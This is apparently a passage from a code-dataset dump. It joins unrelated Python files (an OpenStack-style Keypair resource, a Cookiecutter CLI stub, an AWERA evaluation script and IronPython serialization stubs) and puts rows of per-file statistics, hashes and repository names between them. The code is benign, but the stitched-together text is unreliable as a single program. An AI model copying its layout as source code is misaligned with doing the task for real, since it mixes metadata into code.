fingerprint = resource.Body('fingerprint')
# NOTE: There is in fact an 'id' field. However, it's not useful
# because all operations use the 'name' as an identifier.
# Additionally, the 'id' field only appears *after* creation,
# so suddenly you have an 'id' field filled in after the fact,
# and it just gets in the way. We need to cover this up by listing
# name as alternate_id and listing id as coming from name.
#: The id identifying the keypair
id = resource.Body('name')
#: A name identifying the keypair
name = resource.Body('name', alternate_id=True)
#: The private key for the keypair
private_key = resource.Body('private_key')
#: The SSH public key that is paired with the server.
public_key = resource.Body('public_key')
#: The type of the keypair.
type = resource.Body('type', default='ssh')
#: The user_id for a keypair.
user_id = resource.Body('user_id')
def _consume_attrs(self, mapping, attrs):
# TODO(mordred) This should not be required. However, without doing
# it **SOMETIMES** keypair picks up id and not name. This is a hammer.
if 'id' in attrs:
attrs.setdefault('name', attrs.pop('id'))
return super(Keypair, self)._consume_attrs(mapping, attrs)
@classmethod
def existing(cls, connection=None, **kwargs):
"""Create an instance of an existing remote resource.
When creating the instance set the ``_synchronized`` parameter
of :class:`Resource` to ``True`` to indicate that it represents the
state of an existing server-side resource. As such, all attributes
passed in ``**kwargs`` are considered "clean", such that an immediate
:meth:`update` call would not generate a body of attributes to be
modified on the server.
:param dict kwargs: Each of the named arguments will be set as
attributes on the resulting Resource object.
"""
# Listing KPs return list with resource_key structure. Instead of
# overriding whole list just try to create object smart.
if cls.resource_key in kwargs:
args = kwargs.pop(cls.resource_key)
kwargs.update(**args)
return cls(_synchronized=True, connection=connection, **kwargs)
| 41.453488 | 78 | 0.682188 | 492 | 3,565 | 4.873984 | 0.414634 | 0.045038 | 0.010842 | 0.013344 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.002568 | 0.235344 | 3,565 | 85 | 79 | 41.941176 | 0.877109 | 0.587097 | 0 | 0 | 0 | 0 | 0.085966 | 0 | 0 | 0 | 0 | 0.011765 | 0 | 1 | 0.064516 | false | 0 | 0.032258 | 0 | 0.774194 | 0.032258 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 2 |
e3a25f6b362be856865b8ee973cf2e6573257e88 | 313 | py | Python | waynerv_test/cli.py | mpflynnx/waynerv-test | 5572800926f1a2bf36aa6f145cab0c3b5cb647fe | [
"MIT"
] | null | null | null | waynerv_test/cli.py | mpflynnx/waynerv-test | 5572800926f1a2bf36aa6f145cab0c3b5cb647fe | [
"MIT"
] | null | null | null | waynerv_test/cli.py | mpflynnx/waynerv-test | 5572800926f1a2bf36aa6f145cab0c3b5cb647fe | [
"MIT"
] | null | null | null | """Console script for waynerv_test."""
import click
@click.command()
def main():
"""Main entrypoint."""
click.echo("waynerv-test")
click.echo("=" * len("waynerv-test"))
click.echo("Skeleton project created by Cookiecutter PyPackage")
if __name__ == "__main__":
main() # pragma: no cover
| 19.5625 | 68 | 0.651757 | 37 | 313 | 5.27027 | 0.648649 | 0.169231 | 0.164103 | 0.205128 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.178914 | 313 | 15 | 69 | 20.866667 | 0.758755 | 0.214058 | 0 | 0 | 0 | 0 | 0.353191 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.125 | true | 0 | 0.125 | 0 | 0.25 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
e3a9e1f677c3a2c19194e76c637555f3898199d3 | 2,298 | py | Python | run_awera_eval_2.py | lthUniBonn/AWERA | fa7f210516318bcfcbe1c99abbb5954b0cbaf682 | [
"MIT"
] | null | null | null | run_awera_eval_2.py | lthUniBonn/AWERA | fa7f210516318bcfcbe1c99abbb5954b0cbaf682 | [
"MIT"
] | null | null | null | run_awera_eval_2.py | lthUniBonn/AWERA | fa7f210516318bcfcbe1c99abbb5954b0cbaf682 | [
"MIT"
] | null | null | null | import os
from AWERA import config, ChainAWERA
import numpy as np
# TODO make clear how each module runs with the inout of the previous
# power_model.load() .generate() how is the object made/passed
if __name__ == '__main__':
# read config from jobnumber
# 8 small jobs
# 4 big jobs
loc_id = int(os.environ['LOC_ID'])
settings = {
'Processing': {'n_cores': 2}, # 10
'Data': {'n_locs': -1,
'location_type': 'europe'},
'Clustering': {
'n_clusters': 8, # TODO choose before predict labels...
'training': {
'n_locs': 5000,
'location_type': 'europe'
}
},
'IO': {'result_dir':
"/cephfs/user/s6lathim/AWERA_results/"}
}
print(settings)
# Update settings to config
config.update(settings)
working_title = 'eval_locs_{}'.format(loc_id) # 'run_profile'
from AWERA.eval.evaluation import evalAWERA
e = evalAWERA(config)
# working_title = 'sliding_window_eval'
# e.sliding_window_power(time_window=24, # Hours for hourly data
# at_night=False, # True,
# power_lower_bar=None,
# power_lower_perc=15,
# read_if_possible=True,
# locs_slice=None, # (loc_id, 1000)) # ,
# read_from_slices=(23, 1000)) #
e.aep_map()
# print('Map plotted.')
# e.power_freq()
# profiler.disable()
# # # Write profiler output
# file_name = (
# config.IO.result_dir
# + config.IO.format.plot_output.format(
# data_info=config.Data.data_info,
# data_info_training=config.Clustering.training.data_info,
# settings_info=config.Clustering.training.settings_info)
# .replace('.pdf', '{}.profile'.format(loc_id))
# )
# with open(file_name.format(title='run_profile'), 'w') as f:
# stats = pstats.Stats(profiler, stream=f)
# stats.strip_dirs()
# stats.sort_stats('cumtime')
# stats.print_stats('py:', .1)
# print('Profile output written to: ',
# file_name.format(title=working_title))
#plt.show()
| 32.828571 | 76 | 0.551349 | 256 | 2,298 | 4.710938 | 0.507813 | 0.02073 | 0.029851 | 0.031509 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.017408 | 0.325065 | 2,298 | 69 | 77 | 33.304348 | 0.760155 | 0.586597 | 0 | 0 | 1 | 0 | 0.191372 | 0.039823 | 0 | 0 | 0 | 0.014493 | 0 | 1 | 0 | false | 0 | 0.16 | 0 | 0.16 | 0.04 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
e3b01797310c7cd2b410621f4337021dedac5ae9 | 42,499 | py | Python | release/stubs/System/ComponentModel/Design/Serialization.py | YKato521/ironpython-stubs | b1f7c580de48528490b3ee5791b04898be95a9ae | [
"MIT"
] | null | null | null | release/stubs/System/ComponentModel/Design/Serialization.py | YKato521/ironpython-stubs | b1f7c580de48528490b3ee5791b04898be95a9ae | [
"MIT"
] | null | null | null | release/stubs/System/ComponentModel/Design/Serialization.py | YKato521/ironpython-stubs | b1f7c580de48528490b3ee5791b04898be95a9ae | [
"MIT"
] | null | null | null | # encoding: utf-8
# module System.ComponentModel.Design.Serialization calls itself Serialization
# from System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
# by generator 1.145
""" NamespaceTracker represent a CLS namespace. """
# no imports
# no functions
# classes
class ComponentSerializationService(object):
""" Provides the base class for serializing a set of components or serializable objects into a serialization store. """
def CreateStore(self):
"""
CreateStore(self: ComponentSerializationService) -> SerializationStore
Creates a new System.ComponentModel.Design.Serialization.SerializationStore.
Returns: A new System.ComponentModel.Design.Serialization.SerializationStore.
"""
pass
def Deserialize(self, store, container=None):
"""
Deserialize(self: ComponentSerializationService, store: SerializationStore, container: IContainer) -> ICollection
Deserializes the given store and populates the given System.ComponentModel.IContainer with
deserialized System.ComponentModel.IComponent objects.
store: The System.ComponentModel.Design.Serialization.SerializationStore to deserialize.
container: The System.ComponentModel.IContainer to which System.ComponentModel.IComponent objects will be
added.
Returns: A collection of objects created according to the stored state.
Deserialize(self: ComponentSerializationService, store: SerializationStore) -> ICollection
Deserializes the given store to produce a collection of objects.
store: The System.ComponentModel.Design.Serialization.SerializationStore to deserialize.
Returns: A collection of objects created according to the stored state.
"""
pass
def DeserializeTo(
self, store, container, validateRecycledTypes=None, applyDefaults=None
):
"""
DeserializeTo(self: ComponentSerializationService, store: SerializationStore, container: IContainer, validateRecycledTypes: bool)
Deserializes the given System.ComponentModel.Design.Serialization.SerializationStore to the
given container, optionally validating recycled types.
store: The System.ComponentModel.Design.Serialization.SerializationStore to deserialize.
container: The container to which System.ComponentModel.IComponent objects will be added.
validateRecycledTypes: true to guarantee that the deserialization will only work if applied to an object of the same
type.
DeserializeTo(self: ComponentSerializationService, store: SerializationStore, container: IContainer)
Deserializes the given System.ComponentModel.Design.Serialization.SerializationStore to the
given container.
store: The System.ComponentModel.Design.Serialization.SerializationStore to deserialize.
container: The container to which System.ComponentModel.IComponent objects will be added.
DeserializeTo(self: ComponentSerializationService, store: SerializationStore, container: IContainer, validateRecycledTypes: bool, applyDefaults: bool)
Deserializes the given System.ComponentModel.Design.Serialization.SerializationStore to the
given container, optionally applying default property values.
store: The System.ComponentModel.Design.Serialization.SerializationStore to deserialize.
container: The container to which System.ComponentModel.IComponent objects will be added.
validateRecycledTypes: true to guarantee that the deserialization will only work if applied to an object of the same
type.
applyDefaults: true to indicate that the default property values should be applied.
"""
pass
def LoadStore(self, stream):
"""
LoadStore(self: ComponentSerializationService, stream: Stream) -> SerializationStore
Loads a System.ComponentModel.Design.Serialization.SerializationStore from a stream.
stream: The System.IO.Stream from which the store will be loaded.
Returns: A new System.ComponentModel.Design.Serialization.SerializationStore instance.
"""
pass
def Serialize(self, store, value):
"""
Serialize(self: ComponentSerializationService, store: SerializationStore, value: object)
Serializes the given object to the given
System.ComponentModel.Design.Serialization.SerializationStore.
store: The System.ComponentModel.Design.Serialization.SerializationStore to which the state of value
will be written.
value: The object to serialize.
"""
pass
def SerializeAbsolute(self, store, value):
"""
SerializeAbsolute(self: ComponentSerializationService, store: SerializationStore, value: object)
Serializes the given object, accounting for default property values.
store: The System.ComponentModel.Design.Serialization.SerializationStore to which the state of value
will be serialized.
value: The object to serialize.
"""
pass
def SerializeMember(self, store, owningObject, member):
"""
SerializeMember(self: ComponentSerializationService, store: SerializationStore, owningObject: object, member: MemberDescriptor)
Serializes the given member on the given object.
store: The System.ComponentModel.Design.Serialization.SerializationStore to which the state of member
will be serialized.
owningObject: The object to which member is attached.
member: A System.ComponentModel.MemberDescriptor specifying the member to serialize.
"""
pass
def SerializeMemberAbsolute(self, store, owningObject, member):
"""
SerializeMemberAbsolute(self: ComponentSerializationService, store: SerializationStore, owningObject: object, member: MemberDescriptor)
Serializes the given member on the given object, accounting for the default property value.
store: The System.ComponentModel.Design.Serialization.SerializationStore to which the state of member
will be serialized.
owningObject: The object to which member is attached.
member: The member to serialize.
"""
pass
class ContextStack(object):
"""
Provides a stack object that can be used by a serializer to make information available to nested serializers.
ContextStack()
"""
def Append(self, context):
"""
Append(self: ContextStack, context: object)
Appends an object to the end of the stack, rather than pushing it onto the top of the stack.
context: A context object to append to the stack.
"""
pass
def Pop(self):
"""
Pop(self: ContextStack) -> object
Removes the current object off of the stack, returning its value.
Returns: The object removed from the stack; null if no objects are on the stack.
"""
pass
def Push(self, context):
"""
Push(self: ContextStack, context: object)
Pushes, or places, the specified object onto the stack.
context: The context object to push onto the stack.
"""
pass
def __getitem__(self, *args): # cannot find CLR method
""" x.__getitem__(y) <==> x[y]x.__getitem__(y) <==> x[y] """
pass
Current = property(
lambda self: object(), lambda self, v: None, lambda self: None
) # default
"""Gets the current object on the stack.
Get: Current(self: ContextStack) -> object
"""
class DefaultSerializationProviderAttribute(Attribute, _Attribute):
"""
The System.ComponentModel.Design.Serialization.DefaultSerializationProviderAttribute attribute is placed on a serializer to indicate the class to use as a default provider of that type of serializer.
DefaultSerializationProviderAttribute(providerType: Type)
DefaultSerializationProviderAttribute(providerTypeName: str)
"""
def __init__(self, *args): # cannot find CLR method
""" x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """
pass
@staticmethod # known case of __new__
def __new__(self, *__args):
"""
__new__(cls: type, providerType: Type)
__new__(cls: type, providerTypeName: str)
"""
pass
ProviderTypeName = property(
lambda self: object(), lambda self, v: None, lambda self: None
) # default
"""Gets the type name of the serialization provider.
Get: ProviderTypeName(self: DefaultSerializationProviderAttribute) -> str
"""
class DesignerLoader(object):
""" Provides a basic designer loader interface that can be used to implement a custom designer loader. """
def BeginLoad(self, host):
"""
BeginLoad(self: DesignerLoader, host: IDesignerLoaderHost)
Begins loading a designer.
host: The loader host through which this loader loads components.
"""
pass
def Dispose(self):
"""
Dispose(self: DesignerLoader)
Releases all resources used by the System.ComponentModel.Design.Serialization.DesignerLoader.
"""
pass
def Flush(self):
"""
Flush(self: DesignerLoader)
Writes cached changes to the location that the designer was loaded from.
"""
pass
Loading = property(
lambda self: object(), lambda self, v: None, lambda self: None
) # default
"""Gets a value indicating whether the loader is currently loading a document.
Get: Loading(self: DesignerLoader) -> bool
"""
class DesignerSerializerAttribute(Attribute, _Attribute):
"""
Indicates a serializer for the serialization manager to use to serialize the values of the type this attribute is applied to. This class cannot be inherited.
DesignerSerializerAttribute(serializerType: Type, baseSerializerType: Type)
DesignerSerializerAttribute(serializerTypeName: str, baseSerializerType: Type)
DesignerSerializerAttribute(serializerTypeName: str, baseSerializerTypeName: str)
"""
def __init__(self, *args): # cannot find CLR method
""" x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """
pass
@staticmethod # known case of __new__
def __new__(self, *__args):
"""
__new__(cls: type, serializerType: Type, baseSerializerType: Type)
__new__(cls: type, serializerTypeName: str, baseSerializerType: Type)
__new__(cls: type, serializerTypeName: str, baseSerializerTypeName: str)
"""
pass
SerializerBaseTypeName = property(
lambda self: object(), lambda self, v: None, lambda self: None
) # default
"""Gets the fully qualified type name of the serializer base type.
Get: SerializerBaseTypeName(self: DesignerSerializerAttribute) -> str
"""
SerializerTypeName = property(
lambda self: object(), lambda self, v: None, lambda self: None
) # default
"""Gets the fully qualified type name of the serializer.
Get: SerializerTypeName(self: DesignerSerializerAttribute) -> str
"""
TypeId = property(
lambda self: object(), lambda self, v: None, lambda self: None
) # default
"""Indicates a unique ID for this attribute type.
Get: TypeId(self: DesignerSerializerAttribute) -> object
"""
class IDesignerLoaderHost(IDesignerHost, IServiceContainer, IServiceProvider):
""" Provides an interface that can extend a designer host to support loading from a serialized state. """
def EndLoad(self, baseClassName, successful, errorCollection):
"""
EndLoad(self: IDesignerLoaderHost, baseClassName: str, successful: bool, errorCollection: ICollection)
Ends the designer loading operation.
baseClassName: The fully qualified name of the base class of the document that this designer is designing.
successful: true if the designer is successfully loaded; otherwise, false.
errorCollection: A collection containing the errors encountered during load, if any. If no errors were
encountered, pass either an empty collection or null.
"""
pass
def Reload(self):
"""
Reload(self: IDesignerLoaderHost)
Reloads the design document.
"""
pass
def __init__(self, *args): # cannot find CLR method
""" x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """
pass
class IDesignerLoaderHost2(
IDesignerLoaderHost, IDesignerHost, IServiceContainer, IServiceProvider
):
""" Provides an interface that extends System.ComponentModel.Design.Serialization.IDesignerLoaderHost to specify whether errors are tolerated while loading a design document. """
def __init__(self, *args): # cannot find CLR method
""" x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """
pass
CanReloadWithErrors = property(
lambda self: object(), lambda self, v: None, lambda self: None
) # default
"""Gets or sets a value indicating whether it is possible to reload with errors.
Get: CanReloadWithErrors(self: IDesignerLoaderHost2) -> bool
Set: CanReloadWithErrors(self: IDesignerLoaderHost2) = value
"""
IgnoreErrorsDuringReload = property(
lambda self: object(), lambda self, v: None, lambda self: None
) # default
"""Gets or sets a value indicating whether errors should be ignored when System.ComponentModel.Design.Serialization.IDesignerLoaderHost.Reload is called.
Get: IgnoreErrorsDuringReload(self: IDesignerLoaderHost2) -> bool
Set: IgnoreErrorsDuringReload(self: IDesignerLoaderHost2) = value
"""
class IDesignerLoaderService:
""" Provides an interface that can extend a designer loader to support asynchronous loading of external components. """
def AddLoadDependency(self):
"""
AddLoadDependency(self: IDesignerLoaderService)
Registers an external component as part of the load process managed by this interface.
"""
pass
def DependentLoadComplete(self, successful, errorCollection):
"""
DependentLoadComplete(self: IDesignerLoaderService, successful: bool, errorCollection: ICollection)
Signals that a dependent load has finished.
successful: true if the load of the designer is successful; false if errors prevented the load from
finishing.
errorCollection: A collection of errors that occurred during the load, if any. If no errors occurred, pass either
an empty collection or null.
"""
pass
def Reload(self):
"""
Reload(self: IDesignerLoaderService) -> bool
Reloads the design document.
Returns: true if the reload request is accepted, or false if the loader does not allow the reload.
"""
pass
def __init__(self, *args): # cannot find CLR method
""" x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """
pass
class IDesignerSerializationManager(IServiceProvider):
""" Provides an interface that can manage design-time serialization. """
def AddSerializationProvider(self, provider):
"""
AddSerializationProvider(self: IDesignerSerializationManager, provider: IDesignerSerializationProvider)
Adds the specified serialization provider to the serialization manager.
provider: The serialization provider to add.
"""
pass
def CreateInstance(self, type, arguments, name, addToContainer):
"""
CreateInstance(self: IDesignerSerializationManager, type: Type, arguments: ICollection, name: str, addToContainer: bool) -> object
Creates an instance of the specified type and adds it to a collection of named instances.
type: The data type to create.
arguments: The arguments to pass to the constructor for this type.
name: The name of the object. This name can be used to access the object later through
System.ComponentModel.Design.Serialization.IDesignerSerializationManager.GetInstance(System.Strin
g). If null is passed, the object is still created but cannot be accessed by name.
addToContainer: If true, this object is added to the design container. The object must implement
System.ComponentModel.IComponent for this to have any effect.
Returns: The newly created object instance.
"""
pass
def GetInstance(self, name):
"""
GetInstance(self: IDesignerSerializationManager, name: str) -> object
Gets an instance of a created object of the specified name, or null if that object does not
exist.
name: The name of the object to retrieve.
Returns: An instance of the object with the given name, or null if no object by that name can be found.
"""
pass
def GetName(self, value):
"""
GetName(self: IDesignerSerializationManager, value: object) -> str
Gets the name of the specified object, or null if the object has no name.
value: The object to retrieve the name for.
Returns: The name of the object, or null if the object is unnamed.
"""
pass
def GetSerializer(self, objectType, serializerType):
"""
GetSerializer(self: IDesignerSerializationManager, objectType: Type, serializerType: Type) -> object
Gets a serializer of the requested type for the specified object type.
objectType: The type of the object to get the serializer for.
serializerType: The type of the serializer to retrieve.
Returns: An instance of the requested serializer, or null if no appropriate serializer can be located.
"""
pass
def GetType(self, typeName):
"""
GetType(self: IDesignerSerializationManager, typeName: str) -> Type
Gets a type of the specified name.
typeName: The fully qualified name of the type to load.
Returns: An instance of the type, or null if the type cannot be loaded.
"""
pass
def RemoveSerializationProvider(self, provider):
"""
RemoveSerializationProvider(self: IDesignerSerializationManager, provider: IDesignerSerializationProvider)
Removes a custom serialization provider from the serialization manager.
provider: The provider to remove. This object must have been added using
System.ComponentModel.Design.Serialization.IDesignerSerializationManager.AddSerializationProvider
(System.ComponentModel.Design.Serialization.IDesignerSerializationProvider).
"""
pass
def ReportError(self, errorInformation):
"""
ReportError(self: IDesignerSerializationManager, errorInformation: object)
Reports an error in serialization.
errorInformation: The error to report. This information object can be of any object type. If it is an exception,
the message of the exception is extracted and reported to the user. If it is any other type,
System.Object.ToString is called to display the information to the user.
"""
pass
def SetName(self, instance, name):
"""
SetName(self: IDesignerSerializationManager, instance: object, name: str)
Sets the name of the specified existing object.
instance: The object instance to name.
name: The name to give the instance.
"""
pass
def __init__(self, *args): # cannot find CLR method
""" x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """
pass
Context = property(
lambda self: object(), lambda self, v: None, lambda self: None
) # default
"""Gets a stack-based, user-defined storage area that is useful for communication between serializers.
Get: Context(self: IDesignerSerializationManager) -> ContextStack
"""
Properties = property(
lambda self: object(), lambda self, v: None, lambda self: None
) # default
"""Indicates custom properties that can be serializable with available serializers.
Get: Properties(self: IDesignerSerializationManager) -> PropertyDescriptorCollection
"""
ResolveName = None
SerializationComplete = None
class IDesignerSerializationProvider:
""" Provides an interface that enables access to a serializer. """
def GetSerializer(self, manager, currentSerializer, objectType, serializerType):
"""
GetSerializer(self: IDesignerSerializationProvider, manager: IDesignerSerializationManager, currentSerializer: object, objectType: Type, serializerType: Type) -> object
Gets a serializer using the specified attributes.
manager: The serialization manager requesting the serializer.
currentSerializer: An instance of the current serializer of the specified type. This can be null if no serializer
of the specified type exists.
objectType: The data type of the object to serialize.
serializerType: The data type of the serializer to create.
Returns: An instance of a serializer of the type requested, or null if the request cannot be satisfied.
"""
pass
def __init__(self, *args): # cannot find CLR method
""" x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """
pass
class IDesignerSerializationService:
""" Provides an interface that can invoke serialization and deserialization. """
def Deserialize(self, serializationData):
"""
Deserialize(self: IDesignerSerializationService, serializationData: object) -> ICollection
Deserializes the specified serialization data object and returns a collection of objects
represented by that data.
serializationData: An object consisting of serialized data.
Returns: An System.Collections.ICollection of objects rebuilt from the specified serialization data
object.
"""
pass
def Serialize(self, objects):
"""
Serialize(self: IDesignerSerializationService, objects: ICollection) -> object
Serializes the specified collection of objects and stores them in a serialization data object.
objects: A collection of objects to serialize.
Returns: An object that contains the serialized state of the specified collection of objects.
"""
pass
def __init__(self, *args): # cannot find CLR method
""" x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """
pass
class INameCreationService:
""" Provides a service that can generate unique names for objects. """
def CreateName(self, container, dataType):
"""
CreateName(self: INameCreationService, container: IContainer, dataType: Type) -> str
Creates a new name that is unique to all components in the specified container.
container: The container where the new object is added.
dataType: The data type of the object that receives the name.
Returns: A unique name for the data type.
"""
pass
def IsValidName(self, name):
"""
IsValidName(self: INameCreationService, name: str) -> bool
Gets a value indicating whether the specified name is valid.
name: The name to validate.
Returns: true if the name is valid; otherwise, false.
"""
pass
def ValidateName(self, name):
"""
ValidateName(self: INameCreationService, name: str)
Gets a value indicating whether the specified name is valid.
name: The name to validate.
"""
pass
def __init__(self, *args): # cannot find CLR method
""" x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """
pass
class InstanceDescriptor(object):
"""
Provides the information necessary to create an instance of an object. This class cannot be inherited.
InstanceDescriptor(member: MemberInfo, arguments: ICollection, isComplete: bool)
InstanceDescriptor(member: MemberInfo, arguments: ICollection)
"""
def Invoke(self):
"""
Invoke(self: InstanceDescriptor) -> object
Invokes this instance descriptor and returns the object the descriptor describes.
Returns: The object this instance descriptor describes.
"""
pass
@staticmethod # known case of __new__
def __new__(self, member, arguments, isComplete=None):
"""
__new__(cls: type, member: MemberInfo, arguments: ICollection)
__new__(cls: type, member: MemberInfo, arguments: ICollection, isComplete: bool)
"""
pass
Arguments = property(
lambda self: object(), lambda self, v: None, lambda self: None
) # default
"""Gets the collection of arguments that can be used to reconstruct an instance of the object that this instance descriptor represents.
Get: Arguments(self: InstanceDescriptor) -> ICollection
"""
IsComplete = property(
lambda self: object(), lambda self, v: None, lambda self: None
) # default
"""Gets a value indicating whether the contents of this System.ComponentModel.Design.Serialization.InstanceDescriptor completely identify the instance.
Get: IsComplete(self: InstanceDescriptor) -> bool
"""
MemberInfo = property(
lambda self: object(), lambda self, v: None, lambda self: None
) # default
"""Gets the member information that describes the instance this descriptor is associated with.
Get: MemberInfo(self: InstanceDescriptor) -> MemberInfo
"""
class MemberRelationship(object):
"""
Represents a single relationship between an object and a member.
MemberRelationship(owner: object, member: MemberDescriptor)
"""
def Equals(self, obj):
"""
Equals(self: MemberRelationship, obj: object) -> bool
Determines whether two System.ComponentModel.Design.Serialization.MemberRelationship instances
are equal.
obj: The System.ComponentModel.Design.Serialization.MemberRelationship to compare with the current
System.ComponentModel.Design.Serialization.MemberRelationship.
Returns: true if the specified System.ComponentModel.Design.Serialization.MemberRelationship is equal to
the current System.ComponentModel.Design.Serialization.MemberRelationship; otherwise, false.
"""
pass
def GetHashCode(self):
"""
GetHashCode(self: MemberRelationship) -> int
Returns the hash code for this instance.
Returns: A hash code for the current System.ComponentModel.Design.Serialization.MemberRelationship.
"""
pass
def __eq__(self, *args): # cannot find CLR method
""" x.__eq__(y) <==> x==y """
pass
@staticmethod # known case of __new__
def __new__(self, owner, member):
"""
__new__[MemberRelationship]() -> MemberRelationship
__new__(cls: type, owner: object, member: MemberDescriptor)
"""
pass
def __ne__(self, *args): # cannot find CLR method
pass
IsEmpty = property(
lambda self: object(), lambda self, v: None, lambda self: None
) # default
"""Gets a value indicating whether this relationship is equal to the System.ComponentModel.Design.Serialization.MemberRelationship.Empty relationship.
Get: IsEmpty(self: MemberRelationship) -> bool
"""
Member = property(
lambda self: object(), lambda self, v: None, lambda self: None
) # default
"""Gets the related member.
Get: Member(self: MemberRelationship) -> MemberDescriptor
"""
Owner = property(
lambda self: object(), lambda self, v: None, lambda self: None
) # default
"""Gets the owning object.
Get: Owner(self: MemberRelationship) -> object
"""
Empty = None
class MemberRelationshipService(object):
""" Provides the base class for relating one member to another. """
def GetRelationship(self, *args): # cannot find CLR method
"""
GetRelationship(self: MemberRelationshipService, source: MemberRelationship) -> MemberRelationship
Gets a relationship to the given source relationship.
source: The source relationship.
Returns: A relationship to source, or System.ComponentModel.Design.Serialization.MemberRelationship.Empty
if no relationship exists.
"""
pass
def SetRelationship(self, *args): # cannot find CLR method
"""
SetRelationship(self: MemberRelationshipService, source: MemberRelationship, relationship: MemberRelationship)
Creates a relationship between the source object and target relationship.
source: The source relationship.
relationship: The relationship to set into the source.
"""
pass
def SupportsRelationship(self, source, relationship):
"""
SupportsRelationship(self: MemberRelationshipService, source: MemberRelationship, relationship: MemberRelationship) -> bool
Gets a value indicating whether the given relationship is supported.
source: The source relationship.
relationship: The relationship to set into the source.
Returns: true if a relationship between the given two objects is supported; otherwise, false.
"""
pass
def __getitem__(self, *args): # cannot find CLR method
""" x.__getitem__(y) <==> x[y]x.__getitem__(y) <==> x[y] """
pass
def __setitem__(self, *args): # cannot find CLR method
""" x.__setitem__(i, y) <==> x[i]=x.__setitem__(i, y) <==> x[i]= """
pass
class ResolveNameEventArgs(EventArgs):
"""
Provides data for the System.ComponentModel.Design.Serialization.IDesignerSerializationManager.ResolveName event.
ResolveNameEventArgs(name: str)
"""
@staticmethod # known case of __new__
def __new__(self, name):
""" __new__(cls: type, name: str) """
pass
Name = property(
lambda self: object(), lambda self, v: None, lambda self: None
) # default
"""Gets the name of the object to resolve.
Get: Name(self: ResolveNameEventArgs) -> str
"""
Value = property(
lambda self: object(), lambda self, v: None, lambda self: None
) # default
"""Gets or sets the object that matches the name.
Get: Value(self: ResolveNameEventArgs) -> object
Set: Value(self: ResolveNameEventArgs) = value
"""
class ResolveNameEventHandler(MulticastDelegate, ICloneable, ISerializable):
"""
Represents the method that handles the System.ComponentModel.Design.Serialization.IDesignerSerializationManager.ResolveName event of a serialization manager.
ResolveNameEventHandler(object: object, method: IntPtr)
"""
def BeginInvoke(self, sender, e, callback, object):
""" BeginInvoke(self: ResolveNameEventHandler, sender: object, e: ResolveNameEventArgs, callback: AsyncCallback, object: object) -> IAsyncResult """
pass
def CombineImpl(self, *args): # cannot find CLR method
"""
CombineImpl(self: MulticastDelegate, follow: Delegate) -> Delegate
Combines this System.Delegate with the specified System.Delegate to form a new delegate.
follow: The delegate to combine with this delegate.
Returns: A delegate that is the new root of the System.MulticastDelegate invocation list.
"""
pass
def DynamicInvokeImpl(self, *args): # cannot find CLR method
"""
DynamicInvokeImpl(self: Delegate, args: Array[object]) -> object
Dynamically invokes (late-bound) the method represented by the current delegate.
args: An array of objects that are the arguments to pass to the method represented by the current
delegate.-or- null, if the method represented by the current delegate does not require
arguments.
Returns: The object returned by the method represented by the delegate.
"""
pass
def EndInvoke(self, result):
""" EndInvoke(self: ResolveNameEventHandler, result: IAsyncResult) """
pass
def GetMethodImpl(self, *args): # cannot find CLR method
"""
GetMethodImpl(self: MulticastDelegate) -> MethodInfo
Returns a static method represented by the current System.MulticastDelegate.
Returns: A static method represented by the current System.MulticastDelegate.
"""
pass
def Invoke(self, sender, e):
""" Invoke(self: ResolveNameEventHandler, sender: object, e: ResolveNameEventArgs) """
pass
def RemoveImpl(self, *args): # cannot find CLR method
"""
RemoveImpl(self: MulticastDelegate, value: Delegate) -> Delegate
Removes an element from the invocation list of this System.MulticastDelegate that is equal to
the specified delegate.
value: The delegate to search for in the invocation list.
Returns: If value is found in the invocation list for this instance, then a new System.Delegate without
value in its invocation list; otherwise, this instance with its original invocation list.
"""
pass
def __init__(self, *args): # cannot find CLR method
""" x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """
pass
@staticmethod # known case of __new__
def __new__(self, object, method):
""" __new__(cls: type, object: object, method: IntPtr) """
pass
def __reduce_ex__(self, *args): # cannot find CLR method
pass
class RootDesignerSerializerAttribute(Attribute, _Attribute):
"""
